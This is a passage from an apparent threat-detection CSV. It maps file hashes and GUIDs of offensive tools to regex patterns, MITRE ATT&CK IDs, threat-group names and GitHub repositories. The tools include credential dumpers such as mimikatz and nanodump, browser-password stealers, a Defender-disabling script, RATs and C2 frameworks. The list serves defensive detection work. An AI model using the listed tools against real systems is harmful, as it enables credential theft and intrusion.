BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32758" 
"*a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990*",".{0,1000}a87fea89545bb209dcc98edfe23e5171def343793d956308ef1c9b5c1e477990.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","32759" "*a88896071aafd285ea22e4fa7ebcf5037926f0cf5674256a29d31121ddc74013*",".{0,1000}a88896071aafd285ea22e4fa7ebcf5037926f0cf5674256a29d31121ddc74013.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32761" "*a88a0af4e583fbae14ad5003c85f29949b720db848e373668924880369fa8fbd*",".{0,1000}a88a0af4e583fbae14ad5003c85f29949b720db848e373668924880369fa8fbd.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","32762" "*a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db*",".{0,1000}a88f29ebf454ddc490c273365b81093089bb4c9f407546371522c2feaeb446db.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32764" "*a891ef1cf80e8b8130414970e811828379518218c14abb4c843f4a4671cd3502*",".{0,1000}a891ef1cf80e8b8130414970e811828379518218c14abb4c843f4a4671cd3502.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32765" "*a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc*",".{0,1000}a8944d1ff8c72e68ca1bb55dad84aae6cb7d4cbcc92d442dc8497c8949a96adc.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","#filehash","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","32767" "*a89da438ecbe2e8c5f65e2bcbf5d82a84d26ba56dff46eb180c9de213f5a1871*",".{0,1000}a89da438ecbe2e8c5f65e2bcbf5d82a84d26ba56dff46eb180c9de213f5a1871.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Tw1sm/spraycharles","1","0","#filehash","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","32768" "*a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c*",".{0,1000}a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32769" "*a8ac4596bab404b9c23d9551f2a2b5922374b7e1ed8b382159f135ffc8bce8f9*",".{0,1000}a8ac4596bab404b9c23d9551f2a2b5922374b7e1ed8b382159f135ffc8bce8f9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32774" "*a8bb914637ae760a57ab1ea6f00636348371f4bff4ddae20cc14b533ec6d9e6b*",".{0,1000}a8bb914637ae760a57ab1ea6f00636348371f4bff4ddae20cc14b533ec6d9e6b.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","32775" "*a8bc3637b6ff70a1ed94a1b39c54aec2c212f8a657c674987bb92312816938ff*",".{0,1000}a8bc3637b6ff70a1ed94a1b39c54aec2c212f8a657c674987bb92312816938ff.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32776" "*a8c060ee140475c6ff0065e27e2274b37f7c3b9ba433ce2b406710b565ab078a*",".{0,1000}a8c060ee140475c6ff0065e27e2274b37f7c3b9ba433ce2b406710b565ab078a.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","#filehash","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","32777" "*a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7*",".{0,1000}a8ce36f599c838c95b169252fe56cd412923d8d25f1cf906213d39582299ade7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32778" "*a8ddc05a5d82ab6abbf4f329fb508e1025a7dceabbe76d3639156009247792ea*",".{0,1000}a8ddc05a5d82ab6abbf4f329fb508e1025a7dceabbe76d3639156009247792ea.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","32782" "*a8dee73ae0015fdfeaeb4b58514db089a5881f26e01e94c83d685771f2577be4*",".{0,1000}a8dee73ae0015fdfeaeb4b58514db089a5881f26e01e94c83d685771f2577be4.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","32783" "*a8df39bb1afafa9ccc9e0dbd42c912fc17fc4da902b605b330a7705fa8da012c*",".{0,1000}a8df39bb1afafa9ccc9e0dbd42c912fc17fc4da902b605b330a7705fa8da012c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32784" "*a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c*",".{0,1000}a8e669125c435f519ccde055c75dd9c44359ab15525846eeab7292262562b80c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32785" "*a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0*",".{0,1000}a8eb0e74d8b13b7467faafe2bda9b62634c237322ce951c3655578f3331a44e0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32787" "*a8f1156a26f47cfc7c32d3c403f8d238011e80aa0b066cc2132a1b78e69d7eb5*",".{0,1000}a8f1156a26f47cfc7c32d3c403f8d238011e80aa0b066cc2132a1b78e69d7eb5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32790" "*a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb*",".{0,1000}a8f27cc54021b10a9a24bde9dd4b569c2394aa7ad1ca70410959e8abf059eceb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32791" "*a8fca4711a214b5b154a7a9f31018bff0eb59ddc8dfe8bad04dde7f90972437a*",".{0,1000}a8fca4711a214b5b154a7a9f31018bff0eb59ddc8dfe8bad04dde7f90972437a.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","32794" "*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*",".{0,1000}A8FE1F5C\-6B2A\-4417\-907F\-4F6EDE9C15A3.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","#GUIDproject","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","32795" "*a9084eb399a2429615a76b1d33c22452ee5827d736d849744f5039368e8c0984*",".{0,1000}a9084eb399a2429615a76b1d33c22452ee5827d736d849744f5039368e8c0984.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32798" 
"*a909221a35b3fda0f6149de8e58186909cd0efae15bbba614b9a15d4b7d15fd3*",".{0,1000}a909221a35b3fda0f6149de8e58186909cd0efae15bbba614b9a15d4b7d15fd3.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","32800" "*A91421CB-7909-4383-BA43-C2992BBBAC22*",".{0,1000}A91421CB\-7909\-4383\-BA43\-C2992BBBAC22.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","#GUIDproject","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","32801" "*a91430b2ee1746fc061185f83393343b6bbb80f7501366da360cf687b7cb2ec6*",".{0,1000}a91430b2ee1746fc061185f83393343b6bbb80f7501366da360cf687b7cb2ec6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32802" "*a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a*",".{0,1000}a91b2af5590034ad95974a084b37d629d53800e8a4317a54080588cd8504c98a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32804" 
"*a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7*",".{0,1000}a92179596d5d8b12a7b090485c96d00dc9f405246a1992b6ebd059a00c69dad7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32806" "*a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b*",".{0,1000}a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32807" 
"*a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b*",".{0,1000}a92acb50dd8f358f4b2fb99a6f50332006c7823712acd62b88cadfe01c517d9b.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32808" "*a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058*",".{0,1000}a9307f3ece06735d45dbf3af3f84c5787f7afa194927dd3322a744b8f65ee058.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32809" 
"*a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9*",".{0,1000}a93513b46fd03b0bec44784379a68f6564a84691392da67baefe36dddd85f3f9.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","#filehash","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","32811" "*A9386992-CFAC-468A-BD41-78382212E5B9*",".{0,1000}A9386992\-CFAC\-468A\-BD41\-78382212E5B9.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#GUIDproject","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","32812" "*a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67*",".{0,1000}a93f02549ee6f5a59d0472755b8719284f64e0ac451906a42d8eb9f5738add67.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","32813" "*a94219205d14a633058fcd7ea39d33525e07d8aea5411a21d79d4f8c01993b47*",".{0,1000}a94219205d14a633058fcd7ea39d33525e07d8aea5411a21d79d4f8c01993b47.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32814" "*a9489baffe0c884e3ef759f05124e99864b3d4072c7011e71522a1197ed309a9*",".{0,1000}a9489baffe0c884e3ef759f05124e99864b3d4072c7011e71522a1197ed309a9.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","32815" "*a949f0e018ba13b735bd96ed729672c72233f1c4a993eda2e60c301b42de1d7d*",".{0,1000}a949f0e018ba13b735bd96ed729672c72233f1c4a993eda2e60c301b42de1d7d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32816" "*a94a0ca227f9719af8f6cc3c505fba9a63687013f513f6b8991f4f036475740f*",".{0,1000}a94a0ca227f9719af8f6cc3c505fba9a63687013f513f6b8991f4f036475740f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32817" 
"*a95c6bd632b23c5bc2c7d9bcbe95b69e1392f2377232254402fe7d9568eee172*",".{0,1000}a95c6bd632b23c5bc2c7d9bcbe95b69e1392f2377232254402fe7d9568eee172.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32821" "*a96b2bd4b84710a57b236090973820df7aea444d13a671ab573dd422c898dbe4*",".{0,1000}a96b2bd4b84710a57b236090973820df7aea444d13a671ab573dd422c898dbe4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32825" "*a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357*",".{0,1000}a96b774c3d3e7a7727bd9929fb18fbee592377fa1bcd9a732bb8825bb0456357.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32826" "*A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA*",".{0,1000}A96C7C34\-5791\-43CF\-9F8B\-8EF5B3FB6EBA.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#GUIDproject","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","32827" 
"*a96e22322b009000a8b0b8cf7229f4e40c36b260f1076f1c225c12a43613c405*",".{0,1000}a96e22322b009000a8b0b8cf7229f4e40c36b260f1076f1c225c12a43613c405.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","#filehash","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","32828" "*a976cdbaf7401fcf1de10254a4db2873b1b4c8c0b6f0e45a51978e3c77a6968a*",".{0,1000}a976cdbaf7401fcf1de10254a4db2873b1b4c8c0b6f0e45a51978e3c77a6968a.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","0","#filehash","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","32830" "*a97c94ee538d84474a794fdcf7e2f17735aeb7b62be66e1775ad396a4c5357a2*",".{0,1000}a97c94ee538d84474a794fdcf7e2f17735aeb7b62be66e1775ad396a4c5357a2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","32831" "*a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f*",".{0,1000}a98134e477c7bed393de4421eba7773ccce4cbe9bba6ab00fe260338691c352f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32832" 